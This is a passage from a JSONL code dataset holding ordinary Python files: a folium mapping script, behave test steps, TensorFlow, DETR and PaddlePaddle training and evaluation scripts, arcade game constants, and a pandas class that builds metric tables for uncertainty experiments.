    \r\nHeight: %s m\r\n\"\"\"\r\n\r\ndef color_producer(superficie):\r\n if superficie < 960:\r\n return 'green'\r\n elif 960 <= superficie < 3350:\r\n return 'orange'\r\n else:\r\n return 'red'\r\n\r\n\r\nmap = folium.Map(location = [29, -111.30], zoom_start=10, tiles=\"Stamen Terrain\")\r\n\r\nfgvol = folium.FeatureGroup(name=\"Volcanoes\")\r\n\r\nfor lt1, ln1, el in zip (lat1, lon1, elev):\r\n iframe = folium.IFrame(html=html1 % str(el), width=200, height=100)\r\n fgvol.add_child(folium.CircleMarker(location=[lt1,ln1], fill=True, fill_color=color_producer(el), color=color_producer(el), radius=8,\r\n popup=folium.Popup(iframe)))\r\n\r\nfgp = folium.FeatureGroup(name=\"Parques\")\r\n\r\nfor lt, ln, dr, pl, sp in zip(lat, lon, dir, pla, sup):\r\n fgp.add_child(folium.CircleMarker(location=[lt, ln], fill=True, fill_color=color_producer(sp), color=color_producer(sp), radius=8,\r\n popup=\"Plaza: \" + str(pl) + \"\\nDirección: \" + str(dr) + \"\\nSuperficie: \" + str(sp) + \" m²\"))\r\n\r\nfgv = folium.FeatureGroup(name=\"Population\")\r\n\r\n\r\nfgv.add_child(folium.GeoJson(data=open(file='world.json', mode='r', encoding='utf-8-sig').read(),\r\nstyle_function=lambda x: {'fillColor':'green' if x['properties']['POP2005'] < 10000000\r\nelse 'orange' if 10000000 <= x ['properties']['POP2005'] < 20000000 else 'red'}))\r\n\r\n\r\nmap.add_child(fgv)\r\nmap.add_child(fgp)\r\nmap.add_child(fgvol)\r\n\r\nmap.add_child(folium.LayerControl())\r\n\r\nmap.save(\"Map1.html\")\r\n","repo_name":"IssamJim/Practica-Mapa","sub_path":"map1.py","file_name":"map1.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"71120227357","text":"from behave import *\nfrom calculadora import Calculadora\n\n@given('a {values} to factorial')\ndef step_imp(context, values):\n context.calculadora = Calculadora()\n context.value = [int(x) for x in values.split(\",\")]\n\n@when('the calc factorial the values')\ndef step_imp(context):\n context.total = context.calculadora.factorial(context.value[0])\n\n@then('the {total} of factorial is ok')\ndef step_imp(context, total):\n if total== 'None':\n assert(context.total == 'None')\n else:\n assert(context.total == int(total))","repo_name":"EstebanOG/Ejercicio-Pruebas-de-aceptacion","sub_path":"Calculadora BSD/features/steps/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"17967132574","text":"import numpy, sys\nimport tensorflow as tf\nfrom tensorflow.contrib import rnn\nimport preprocess_data\nimport numpy\nfrom lib import shuffle, split_dataset\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) < 2:\n print(\"Usage: train.py DATA_FILE\")\n sys.exit(-1)\n\n max_length = 500\n num_hidden = 512\n batch_size = 64\n\n\n print(\"Loading data...\")\n\n data = numpy.load(sys.argv[1]) #load training data from file\n\n train_x_valid = data[\"x_valid\"]\n train_x_not_valid = data[\"x_not_valid\"]\n train_y_valid = data[\"y_valid\"]\n train_y_not_valid = data[\"y_not_valid\"]\n max_length = data[\"max_length\"][0]\n\n print(train_x_valid)\n\n #split data, make sure test data contains all types of samples (valid and not valid ones)\n train_x_valid, test_x_valid, train_y_valid, test_y_valid = split_dataset(train_x_valid, train_y_valid, 5)\n train_x_not_valid, test_x_not_valid, train_y_not_valid, test_y_not_valid = split_dataset(train_x_not_valid, train_y_not_valid, 5)\n\n train_x = numpy.concatenate((train_x_valid, train_x_not_valid))\n train_y = numpy.concatenate((train_y_valid, train_y_not_valid))\n test_x = numpy.concatenate((test_x_valid, test_x_not_valid))\n test_y = numpy.concatenate((test_y_valid, test_y_not_valid))\n\n\n train_x, train_y = shuffle(train_x, train_y)\n test_x, test_y = shuffle(test_x, test_y)\n\n #convert y to one-hot encoding\n train_y = tf.one_hot(train_y, 2)\n test_y = tf.one_hot(test_y, 2)\n\n train_x = train_x.astype(\"float32\")\n test_x = test_x.astype(\"float32\")\n\n train_x /= 255\n test_x /= 255\n\n train_x = numpy.expand_dims(train_x, axis=2)\n test_x = numpy.expand_dims(test_x, axis=2)\n\n #dataset = tf.data.Dataset.from_tensor_slices((train_x, train_y)) #create dataset from training data\n\n print(\"Setting up network...\")\n\n #input and output layers\n x = tf.placeholder(tf.float32, [None, max_length, 1])\n y = tf.placeholder(tf.float32, [None, 2])\n\n #lstm layer\n #cell = tf.nn.rnn_cell.LSTMCell(num_hidden, state_is_tuple=True)\n cell = rnn.MultiRNNCell([rnn.BasicLSTMCell(num_hidden), rnn.BasicLSTMCell(num_hidden)])\n val, state = tf.nn.dynamic_rnn(cell, x, dtype=tf.float32)\n\n val = tf.transpose(val, [1, 0, 2])\n last = tf.gather(val, int(val.get_shape()[0]) - 1)\n\n weight = tf.Variable(tf.truncated_normal([num_hidden, int(y.get_shape()[1])]))\n bias = tf.Variable(tf.constant(0.1, shape=[y.get_shape()[1]]))\n\n prediction = tf.nn.softmax(tf.matmul(last, weight) + bias)\n cross_entropy = -tf.reduce_sum(y * tf.log(tf.clip_by_value(prediction, 1e-10, 1.0)))\n\n #prediction = tf.matmul(last, weight) + bias\n #cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=prediction, labels=y))\n\n optimizer = tf.train.RMSPropOptimizer(0.1)\n minimize = optimizer.minimize(cross_entropy)\n\n mistakes = tf.not_equal(tf.argmax(y, 1), tf.argmax(prediction, 1))\n error = tf.reduce_mean(tf.cast(mistakes, tf.float32))\n\n print(\"Initialising variables...\")\n\n init_op = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init_op)\n\n print(\"Starting training...\")\n\n test_y = sess.run(test_y) #converting tensor to numpy array\n train_y = sess.run(train_y)\n\n no_of_batches = int(len(train_x) / batch_size)\n epoch = 25\n for i in range(epoch):\n print(\"Training epoch \" + str(i))\n ptr = 0\n for j in range(no_of_batches):\n print(\"Training batch \" + str(j) + \" of \" + str(no_of_batches))\n inp, out = train_x[ptr:ptr + batch_size], train_y[ptr:ptr + batch_size]\n ptr += batch_size\n sess.run(minimize, feed_dict={x: inp, y: out})\n print(\"Evaluating...\")\n incorrect = sess.run(error, feed_dict={x: test_x, y: test_y})\n print('Epoch {:2d} error {:3.4f}%'.format(i + 1, 100 * incorrect))\n sess.close()\n","repo_name":"sagr4019/ResearchProject","sub_path":"neural-networks-experiments/static-analyzer-toy-language/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"73642788316","text":"import argparse\nimport json\nfrom pycocotools.coco import COCO\nfrom pycocotools.cocoeval import COCOeval\nimport tensorflow as tf\nfrom tqdm import tqdm\n\nfrom detr_tensorflow.datasets import COCODatasetBBoxes\nfrom detr_tensorflow import models\nfrom detr_tensorflow.utils import (preprocess_image, read_jpeg_image,\n absolute2relative, xyxy2xywh)\n\n\nparser = argparse.ArgumentParser(\n 'DETR evalutaion script for the COCO dataset.')\n\nparser.add_argument('--coco_path', type=str,\n help='Path to the COCO dataset root directory. '\n 'For evaluation, only the '\n 'validation data needs to be downloaded.')\nparser.add_argument('--backbone', type=str, default=None,\n choices=('resnet50', 'resnet50-dc5',\n 'resnet101', 'resnet101-dc5'),\n help='Choice of backbone CNN for the model.')\nparser.add_argument('--frozen_weights', type=str, default=None,\n help='Path to the pretrained weights file. '\n 'Please check the repository for links to download '\n 'tensorflow ports of the official ones.')\nparser.add_argument('--batch_size', type=int, default=2)\nparser.add_argument('--results_file', type=str, default='results.json',\n help='.json file to save the results in the COCO format.')\nparser.add_argument('--from_file', action='store_true',\n help='If specified, will compute the results using '\n 'the predictions in the --results_file, instead of '\n 'performing inference on the whole validation set again.')\n\nargs = parser.parse_args()\n\n\ncoco_data = COCODatasetBBoxes(\n args.coco_path, partition='val2017', return_boxes=False)\n\n\ndef evaluate(results):\n coco_dt = COCO.loadRes(coco_data.coco, args.results_file)\n cocoEval = COCOeval(coco_data.coco, coco_dt, iouType='bbox')\n cocoEval.evaluate()\n cocoEval.accumulate()\n cocoEval.summarize()\n\n\nif args.from_file:\n evaluate(args.results_file)\n exit()\n\nif args.backbone is None or args.frozen_weights is None:\n raise Exception('If --from_file is not provided, '\n 'both --backbone and --frozen_weights '\n 'must be provided.')\n\nmodel_fns = {\n 'resnet50': models.default.build_detr_resnet50,\n 'resnet50-dc5': models.default.build_detr_resnet50_dc5,\n 'resnet101': models.default.build_detr_resnet101,\n 'resnet101-dc5': models.default.build_detr_resnet101_dc5\n}\n\ndetr = model_fns[args.backbone](num_classes=91)\ndetr.build()\ndetr.load_weights(args.frozen_weights)\n\n\ndataset = tf.data.Dataset.from_generator(\n lambda: coco_data, (tf.int32, tf.string))\ndataset = dataset.map(\n lambda img_id, img_path: (img_id, read_jpeg_image(img_path)))\ndataset = dataset.map(\n lambda img_id, image: (img_id, *preprocess_image(image)))\n\ndataset = dataset.padded_batch(\n batch_size=args.batch_size,\n padded_shapes=((), (None, None, 3), (None, None)),\n padding_values=(None, tf.constant(0.0), tf.constant(True)))\n\nresults = []\n\nwith tqdm(total=len(coco_data)) as pbar:\n for img_ids, images, masks in dataset:\n outputs = detr((images, masks), post_process=True)\n\n for img_id, scores, labels, boxes in zip(\n img_ids, outputs['scores'],\n outputs['labels'], outputs['boxes']):\n img_id = img_id.numpy()\n\n img_info = coco_data.coco.loadImgs([img_id])[0]\n img_height = img_info['height']\n img_width = img_info['width']\n\n for score, label, box in zip(scores, labels, boxes):\n score = score.numpy()\n label = label.numpy()\n box = absolute2relative(box, (img_width, img_height))\n box = xyxy2xywh(box).numpy()\n\n results.append({\n \"image_id\": int(img_id),\n \"category_id\": int(label),\n \"bbox\": box.tolist(),\n \"score\": float(score)\n })\n\n pbar.update(int(len(images)))\n\njson_object = json.dumps(results, indent=2)\nwith open(args.results_file, 'w') as f:\n f.write(json_object)\n\nevaluate(args.results_file)\n","repo_name":"Leonardo-Blanger/detr_tensorflow","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"50"} +{"seq_id":"18556664979","text":"import os\r\nimport sys\r\nimport argparse\r\nimport inspect\r\nimport datetime\r\nimport json\r\nimport numpy as np\r\n\r\nimport time\r\n\r\nimport paddle\r\nimport paddle.fluid as fluid\r\nimport paddle.fluid.optimizer as optimizer\r\n\r\n\r\n#import models\r\nimport hmdb_2d_resnets\r\n\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('-mode', type=str, help='rgb or flow')\r\nparser.add_argument('-exp_name', type=str)\r\nparser.add_argument('-video_dir', type=str, default='data/')\r\nparser.add_argument('-file_dir', type=str, default='data/hmdb/')\r\nparser.add_argument('-batch_size', type=int, default=24)\r\nparser.add_argument('-length', type=int, default=16)\r\nparser.add_argument('-learnable', type=str, default='[0,0,0,0,0]')\r\nparser.add_argument('-niter', type=int)\r\nparser.add_argument('-system', type=str)\r\nparser.add_argument('-model', type=str)\r\nparser.add_argument('-check_point', type=str)\r\nparser.add_argument('-learning_rate', type = float, default = 0.01)\r\nparser.add_argument('-momentum', type = float, default = 0.9)\r\n\r\nargs = parser.parse_args()\r\n\r\n\r\n##################\r\n#\r\n# Create model, dataset, and training setup\r\n#\r\n##################\r\n\r\ndata_path = args.video_dir ## path for train/test data.\r\nfile_path = args.video_dir ## path for train/test description file.\r\n\r\nbatch_size = args.batch_size\r\n\r\nplace = fluid.CUDAPlace(0)\r\nwith fluid.dygraph.guard(place):\r\n\r\n def batch_generator_creator(dataset):\r\n dataset.shuffdata()\r\n def _batch_reader():\r\n for i in range(len(dataset)):\r\n data = dataset[i]\r\n if(data[0].shape[3] == 112):\r\n yield data\r\n\r\n return (_batch_reader)\r\n \r\n if args.system == 'hmdb':\r\n from hmdb_lintel import HMDB as DS\r\n dataseta = DS(file_path, data_path, model=args.model, mode=args.mode, length=args.length)\r\n train_reader = paddle.batch(batch_generator_creator(dataseta),\r\n batch_size=batch_size,\r\n drop_last=False)\r\n \r\n dataset = DS(file_path, data_path, model=args.model, mode=args.mode, length=args.length, c2i=dataseta.class_to_id)\r\n eval_reader = paddle.batch(batch_generator_creator(dataset),\r\n batch_size=batch_size,\r\n drop_last=False)\r\n\r\n\r\n repmodel = hmdb_2d_resnets.resnet50(pretrained=False, mode='rgb') \r\n\r\n lr = args.learning_rate\r\n momentum = args.momentum\r\n lrdecay = fluid.dygraph.InverseTimeDecay(\r\n learning_rate=lr,\r\n decay_steps=3000,\r\n decay_rate=0.5)\r\n \r\n opt = optimizer.MomentumOptimizer(parameter_list=repmodel.parameters(), \r\n learning_rate=lr,\r\n momentum=momentum) \r\n\r\n\r\n#################\r\n#\r\n# Setup logs, store model code\r\n# hyper-parameters, etc...\r\n#\r\n#################\r\n log_name = datetime.datetime.today().strftime('%m-%d-%H%M%S')+'-'+args.exp_name\r\n log_path = os.path.join('logs/',log_name)\r\n os.mkdir(log_path)\r\n os.system('cp * logs/'+log_name+'/')\r\n\r\n# deal with hyper-params...\r\n with open(os.path.join(log_path,'params.json'), 'w') as out:\r\n hyper = vars(args)\r\n json.dump(hyper, out)\r\n log = {'epoch acc':[], 'epoch loss':[], 'val loss':[], 'val acc':[]}\r\n \r\n\r\n###############\r\n#\r\n# Train the model and save everything\r\n#\r\n###############\r\n num_epochs = 20\r\n c = 0\r\n #\r\n \r\n\r\n if(args.check_point):\r\n check_point = os.path.join('logs/',args.check_point)\r\n premodel, _ = fluid.dygraph.load_dygraph(os.path.join(check_point,'Myrepflow'))\r\n repmodel.set_dict(premodel)\r\n\r\n for epoch in range(num_epochs):\r\n phase = 'train'\r\n if phase=='train':\r\n repmodel.train()\r\n tloss = 0.\r\n acc = 0.\r\n tot = 0\r\n step = 0\r\n tacc = 0\r\n e=s=0\r\n for batch_id,data in enumerate(train_reader()): #for vid, cls in dataloader[phase]:\r\n #vid = np.array([data[0]], np.float32)\r\n vid = np.array([x[0] for x in data], np.float32)\r\n cls = np.array([x[1] for x in data]).astype('int64')\r\n cls = cls[:, np.newaxis]\r\n vid = fluid.dygraph.to_variable(vid)\r\n cls = fluid.dygraph.to_variable(cls)\r\n cls.stop_gradient = True\r\n \r\n outputs = repmodel(vid)\r\n \r\n loss = fluid.layers.cross_entropy(outputs, cls)\r\n avg_loss = fluid.layers.mean(loss)\r\n acc=fluid.layers.accuracy(outputs,cls, k=1) \r\n\r\n tacc += acc.numpy()\r\n tloss += avg_loss.numpy() #.item()\r\n avg_loss.backward()\r\n for name, parms in repmodel.named_parameters():\r\n if(name == 'repofrepflow.rep_flow.t_linear.weight'):\r\n print(name, parms.numpy())\r\n \r\n opt.minimize(avg_loss)\r\n repmodel.clear_gradients()\r\n c += 1\r\n step += 1\r\n print('epoch',epoch,'step',step,'train loss',avg_loss.numpy(), 'acc', acc.numpy())\r\n \r\n log['epoch loss'].append((tloss/(step+1e-12)).tolist())\r\n log['epoch acc'].append((tacc/(step+1e-12)).tolist())\r\n\r\n param_path = os.path.join(log_path, str(epoch))\r\n fluid.dygraph.save_dygraph(repmodel.state_dict(),os.path.join(param_path,'Myrepflow')) #save model\r\n \r\n with open(os.path.join(log_path,'log.json'), 'w') as out:\r\n json.dump(log, out)\r\n print('epoch',epoch,'epoch train loss',tloss/(step + 1e-12), 'epoch acc', tacc/(step + 1e-12))\r\n\r\n with open(os.path.join(log_path,'log.json'), 'w') as out:\r\n json.dump(log, out)\r\n \r\n","repo_name":"PaddlePaddle/Contrib","sub_path":"representation-flow/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6069,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"50"} +{"seq_id":"20511829532","text":"\"\"\"\nName: constants.py\nAuthor: Hugh McCutcheon\nDescription: A file containing all of the constant variables used by my code\n\"\"\"\nimport arcade\n\nTILE_SPRITE_SCALING = 1\nPLAYER_SCALING = 1\n\nSCREEN_WIDTH = int(arcade.window_commands.get_display_size()[0]/1)\nSCREEN_HEIGHT = int(arcade.window_commands.get_display_size()[1]/1)\nSCREEN_TITLE = \"Kinarough\"\nSPRITE_PIXEL_SIZE = 128\nGRID_PIXEL_SIZE = (SPRITE_PIXEL_SIZE * TILE_SPRITE_SCALING)\nSCALING = 1\n\n# Physics\nJUMP_SPEED = 20\nGRAVITY = 0.75\nMAX_SPEED = 1000000000000\nACCELERATION_RATE = 0.5\nHORIZONTAL_DAMPING = 0.17\nHORIZONTAL_DAMPING_STOPPING = 0.4\nCUT_JUMP_HEIGHT = 0.5\nFRICTION = 0.0\n\nBULLET_SPEED = 50\n\nUPDATES_PER_FRAME = 5\nMOVEMENT_SPEED = 7\n\nSPRITE_SCALING_LASER = 1\n\nZOOM_AMMOUNT = 400\n","repo_name":"Hugh-McCutcheon/Game-Design","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22332254867","text":"import json\nfrom itertools import product, groupby\nfrom pathlib import Path\nfrom typing import List\n\nimport numpy as np\nimport pandas as pd\n\nimport hydra\n\nfrom evaluation.experiment_version import ExperimentVersion\n\n\nclass DsTaskTable:\n def __init__(self, config):\n # base path is the path to the first experiment cycle\n self.base_path = Path(config.base_path)\n self.versions = self._init_versions(config)\n self.grouped_versions = self._group_versions(\"seed\")\n self.split_param = config.split_param if \"split_param\" in config else None\n self.ds_tasks = config.ds_tasks\n\n def _init_versions(self, config):\n versions = []\n for experiment in config.experiments:\n filtered_config = [\n [(key, v) for v in values]\n for key, values in experiment.iter_params.items()\n ]\n for params in product(*filtered_config):\n version_params = {i[0]: i[1] for i in params}\n exp_config = dict(experiment)\n exp_config.pop(\"iter_params\")\n version_params.update(exp_config)\n version_params[\"base_path\"] = self.base_path\n version_params.update(\n dict(experiment.prediction_models[version_params[\"pred_model\"]])\n )\n exp_version = ExperimentVersion(**version_params)\n versions.append(exp_version)\n return versions\n\n def _key_func(self, version, version_param):\n naming_scheme_group = version.naming_scheme_version.replace(\n f\"{version_param}{{{version_param}}}\", \"\"\n )\n naming_scheme_resolved = naming_scheme_group.format(**version.version_params)\n return version.pred_model, naming_scheme_resolved\n\n def _group_versions(self, version_param):\n # version should be grouped if all version params except for version_param are the same\n grouped_objects = []\n for _, group in groupby(\n self.versions, key=lambda x: self._key_func(x, version_param)\n ):\n group_list = list(group)\n grouped_objects.append(group_list)\n return grouped_objects\n\n def get_base_df(self, grouped_versions):\n pred_models = []\n unc_types = []\n aggregations = []\n for group in grouped_versions:\n model_repeat = len(group[0].unc_types) * len(group[0].aggregations)\n pred_models.extend([group[0].pred_model] * model_repeat)\n for unc_type in group[0].unc_types:\n unc_types.extend([unc_type] * len(group[0].aggregations))\n aggregations.extend(list(group[0].aggregations) * len(group[0].unc_types))\n base_df_dict = {\n (\"\", \"pred_model\"): pred_models,\n (\"\", \"unc_type\"): unc_types,\n (\"\", \"aggregation\"): aggregations,\n }\n\n for ds_task, metrics in self.ds_tasks.items():\n for metric_name, metric_probs in metrics.items():\n if metric_probs.dataset_splits is not None:\n for split in metric_probs.dataset_splits:\n index = pd.MultiIndex.from_tuples(\n [(ds_task, f\"{metric_name} {split}\")]\n )\n base_df_dict[index[0]] = None\n else:\n index = pd.MultiIndex.from_tuples([(ds_task, metric_name)])\n base_df_dict[index[0]] = None\n base_df_dict[ds_task, metric_name] = None\n base_df = pd.DataFrame(base_df_dict)\n base_df.set_index(\n [(\"\", \"pred_model\"), (\"\", \"unc_type\"), (\"\", \"aggregation\")],\n inplace=True,\n )\n return base_df\n\n def fill_metric_pred_model(\n self,\n metric_dicts,\n pred_model,\n mean_df,\n std_df,\n ds_task,\n metric_name,\n metric_key,\n dataset_split,\n ):\n metrics = []\n for metric_dict in metric_dicts:\n if \"metrics\" in metric_dict[\"mean\"]:\n metrics.append(metric_dict[\"mean\"][\"metrics\"][metric_key])\n else:\n metrics.append(metric_dict[\"mean\"][metric_key])\n metrics = np.array(metrics)\n metric_mean = np.mean(metrics)\n metric_std = np.std(metrics, ddof=1)\n idx = pd.IndexSlice\n metric_full_name = (\n f\"{metric_name} {dataset_split}\"\n if dataset_split is not None\n else metric_name\n )\n mean_df.loc[idx[pred_model], [(ds_task, metric_full_name)]] = metric_mean\n std_df.loc[idx[pred_model], [(ds_task, metric_full_name)]] = metric_std\n\n def fill_metric_pred_model_unc_type(\n self,\n metric_dicts,\n pred_model,\n unc_types,\n mean_df,\n std_df,\n ds_task,\n metric_name,\n metric_key,\n dataset_split,\n ):\n for unc_type in unc_types:\n metrics = []\n for metric_dict in metric_dicts:\n if \"metrics\" in metric_dict[\"mean\"][unc_type]:\n metrics.append(metric_dict[\"mean\"][unc_type][\"metrics\"][metric_key])\n else:\n metrics.append(metric_dict[\"mean\"][unc_type][metric_key])\n metrics = np.array(metrics)\n metric_mean = np.mean(metrics)\n metric_std = np.std(metrics, ddof=1)\n idx = pd.IndexSlice\n metric_full_name = (\n f\"{metric_name} {dataset_split}\"\n if dataset_split is not None\n else metric_name\n )\n mean_df.loc[\n idx[pred_model, unc_type], [(ds_task, metric_full_name)]\n ] = metric_mean\n std_df.loc[\n idx[pred_model, unc_type], [(ds_task, metric_full_name)]\n ] = metric_std\n\n def fill_metric_pred_model_unc_type_agg(\n self,\n metric_dicts,\n pred_model,\n unc_types,\n aggregations,\n mean_df,\n std_df,\n ds_task,\n metric_name,\n metric_key,\n dataset_split,\n ):\n for unc_type in unc_types:\n for aggregation in aggregations:\n metrics = []\n for metric_dict in metric_dicts:\n if \"metrics\" in metric_dict[\"mean\"][unc_type][aggregation]:\n metrics.append(\n metric_dict[\"mean\"][unc_type][aggregation][\"metrics\"][\n metric_key\n ]\n )\n else:\n metrics.append(\n metric_dict[\"mean\"][unc_type][aggregation][metric_key]\n )\n metrics = np.array(metrics)\n metric_mean = np.mean(metrics)\n metric_std = np.std(metrics, ddof=1)\n idx = pd.IndexSlice\n metric_full_name = (\n f\"{metric_name} {dataset_split}\"\n if dataset_split is not None\n else metric_name\n )\n mean_df.loc[\n idx[pred_model, unc_type, aggregation],\n [(ds_task, metric_full_name)],\n ] = metric_mean\n std_df.loc[\n idx[pred_model, unc_type, aggregation],\n [(ds_task, metric_full_name)],\n ] = metric_std\n\n def fill_single_metric(\n self,\n mean_df,\n std_df,\n ds_task,\n metric_name,\n metric_probs,\n versions: List[ExperimentVersion],\n dataset_split,\n ):\n metric_dicts = []\n for version in versions:\n if dataset_split is not None:\n metrics_json = (\n version.exp_path / dataset_split / metric_probs.metrics_file_name\n )\n else:\n metrics_json = version.exp_path / metric_probs.metrics_file_name\n with open(metrics_json) as f:\n metrics = json.load(f)\n metric_dicts.append(metrics)\n pred_model = versions[0].pred_model\n if len(metric_probs.levels) == 1:\n self.fill_metric_pred_model(\n metric_dicts=metric_dicts,\n pred_model=pred_model,\n mean_df=mean_df,\n std_df=std_df,\n ds_task=ds_task,\n metric_name=metric_name,\n metric_key=metric_probs.metrics_key,\n dataset_split=dataset_split,\n )\n elif len(metric_probs.levels) == 2:\n unc_types = versions[0].unc_types\n self.fill_metric_pred_model_unc_type(\n metric_dicts=metric_dicts,\n pred_model=pred_model,\n unc_types=unc_types,\n mean_df=mean_df,\n std_df=std_df,\n ds_task=ds_task,\n metric_name=metric_name,\n metric_key=metric_probs.metrics_key,\n dataset_split=dataset_split,\n )\n elif len(metric_probs.levels) == 3:\n unc_types = versions[0].unc_types\n aggregations = versions[0].aggregations\n if metric_name == \"al_improvement\":\n unc_types = [\n unc_type\n for unc_type in unc_types\n if unc_type != \"aleatoric_uncertainty\"\n ]\n self.fill_metric_pred_model_unc_type_agg(\n metric_dicts=metric_dicts,\n pred_model=pred_model,\n unc_types=unc_types,\n aggregations=aggregations,\n mean_df=mean_df,\n std_df=std_df,\n ds_task=ds_task,\n metric_name=metric_name,\n metric_key=metric_probs.metrics_key,\n dataset_split=dataset_split,\n )\n\n def fill_all_metrics(self, mean_df, std_df, versions: List[ExperimentVersion]):\n for ds_task, metrics in self.ds_tasks.items():\n for metric_name, metric_probs in metrics.items():\n if metric_probs.dataset_splits is not None:\n for dataset_split in metric_probs.dataset_splits:\n self.fill_single_metric(\n mean_df=mean_df,\n std_df=std_df,\n ds_task=ds_task,\n metric_name=metric_name,\n metric_probs=metric_probs,\n versions=versions,\n dataset_split=dataset_split,\n )\n else:\n self.fill_single_metric(\n mean_df=mean_df,\n std_df=std_df,\n ds_task=ds_task,\n metric_name=metric_name,\n metric_probs=metric_probs,\n versions=versions,\n dataset_split=None,\n )\n\n def get_unc_measure(self, df_row):\n if df_row.name[0] == \"Softmax\":\n return \"MSR\"\n elif df_row.name[0] == \"SSN\":\n if df_row.name[1] == \"predictive_uncertainty\":\n return \"PE\"\n elif df_row.name[1] == \"aleatoric_uncertainty\":\n return \"MI\"\n else:\n return \"EE\"\n else:\n if df_row.name[1] == \"predictive_uncertainty\":\n return \"PE\"\n elif df_row.name[1] == \"aleatoric_uncertainty\":\n return \"EE\"\n else:\n return \"MI\"\n\n def create_single_table(self, grouped_versions):\n mean_df = self.get_base_df(grouped_versions)\n std_df = self.get_base_df(grouped_versions)\n for group in grouped_versions:\n self.fill_all_metrics(mean_df, std_df, group)\n\n mean_df[(\"\", \"unc_measure\")] = mean_df.apply(self.get_unc_measure, axis=1)\n mean_df = mean_df.set_index((\"\", \"unc_measure\"), append=True)\n mean_df = mean_df.reorder_levels(\n [\n (\"\", \"pred_model\"),\n (\"\", \"unc_measure\"),\n (\"\", \"unc_type\"),\n (\"\", \"aggregation\"),\n ]\n )\n\n std_df[(\"\", \"unc_measure\")] = std_df.apply(self.get_unc_measure, axis=1)\n std_df = std_df.set_index((\"\", \"unc_measure\"), append=True)\n std_df = std_df.reorder_levels(\n [\n (\"\", \"pred_model\"),\n (\"\", \"unc_measure\"),\n (\"\", \"unc_type\"),\n (\"\", \"aggregation\"),\n ]\n )\n # multiply by 100 to see more decimals in table\n mean_df = mean_df * 100\n std_df = std_df * 100\n return mean_df, std_df\n\n def create(self):\n if self.split_param is not None:\n mean_dfs = []\n std_dfs = []\n for split_value in self.split_param.split_values:\n filtered_grouped_versions = []\n for group in self.grouped_versions:\n if group[0].version_params[self.split_param.name] == split_value:\n filtered_grouped_versions.append(group)\n mean_df, std_df = self.create_single_table(filtered_grouped_versions)\n mean_dfs.append(mean_df)\n std_dfs.append(std_df)\n mean_df = pd.concat(mean_dfs, keys=self.split_param.split_values)\n mean_df.index.names = [self.split_param.name, *mean_df.index.names[1:]]\n std_df = pd.concat(std_dfs, keys=self.split_param.split_values)\n std_df.index.names = [self.split_param.name, *std_df.index.names[1:]]\n else:\n mean_df, std_df = self.create_single_table(self.grouped_versions)\n if \"Dropout-Final\" in mean_df.index.levels[0]:\n mean_df.rename({\"Dropout-Final\": \"Dropout\"}, axis=0, level=0, inplace=True)\n std_df.rename({\"Dropout-Final\": \"Dropout\"}, axis=0, level=0, inplace=True)\n return mean_df, std_df\n\n def format_mean_std(self, mean, std):\n mean = mean.astype(float).round(2).astype(str)\n std = std.astype(float).round(2).astype(str)\n return mean.combine(std, lambda x, y: f\"{x}±{y}\")\n\n def apply_background_gradient(\n self, styler, cell, reverse=False, results_df=None, split_feature=None\n ):\n if split_feature is None:\n if reverse:\n # reverse means higher scores are better\n # gmap = (results_df[cell]).mul(-1).tolist()\n gmap = (results_df[cell]).mul(-1).tolist()\n else:\n gmap = (results_df[cell]).tolist()\n styler.background_gradient(\n axis=0,\n cmap=\"YlOrRd\",\n gmap=gmap,\n subset=pd.IndexSlice[pd.IndexSlice[:, :, :], [cell]],\n )\n else:\n if reverse:\n # reverse means higher scores are better\n gmap = (results_df.loc[split_feature, cell]).mul(-1).tolist()\n else:\n gmap = (results_df.loc[split_feature, cell]).tolist()\n styler.background_gradient(\n axis=0,\n cmap=\"YlOrRd\",\n gmap=gmap,\n subset=pd.IndexSlice[pd.IndexSlice[split_feature], [cell]],\n )\n\n def format_color(self, styler, gradient_cells, gradient_cells_reverse, mean_df):\n if self.split_param is not None:\n for split_value in self.split_param.split_values:\n for cell in gradient_cells_reverse:\n # if cell not in cells_drop:\n if cell in mean_df:\n self.apply_background_gradient(\n styler,\n cell,\n reverse=True,\n results_df=mean_df,\n split_feature=split_value,\n )\n for cell in gradient_cells:\n # if cell not in cells_drop:\n if cell in mean_df:\n self.apply_background_gradient(\n styler,\n cell,\n reverse=False,\n results_df=mean_df,\n split_feature=split_value,\n )\n else:\n for cell in gradient_cells_reverse:\n # if cell not in cells_drop:\n if cell in mean_df:\n self.apply_background_gradient(\n styler, cell, reverse=True, results_df=mean_df\n )\n for cell in gradient_cells:\n # if cell not in cells_drop:\n if cell in mean_df:\n self.apply_background_gradient(\n styler, cell, reverse=False, results_df=mean_df\n )\n\n def to_latex(self, mean_df, std_df):\n results_df = mean_df.combine(std_df, self.format_mean_std)\n results_df.index.names = [\n name if type(name) == str else name[1] for name in results_df.index.names\n ]\n styler = results_df.style\n\n gradient_cells = []\n gradient_cells_reverse = []\n column_format = \"l|\" * (len(results_df.index.names)) + \"|\"\n for ds_task, task_params in self.ds_tasks.items():\n num_metrics_cols = 0\n for metric, metric_params in task_params.items():\n if metric_params[\"dataset_splits\"] is not None:\n num_metrics_cols += len(metric_params[\"dataset_splits\"])\n for split in metric_params[\"dataset_splits\"]:\n if metric_params[\"higher_better\"]:\n gradient_cells_reverse.append(\n (ds_task, f\"{metric} {split}\")\n )\n else:\n 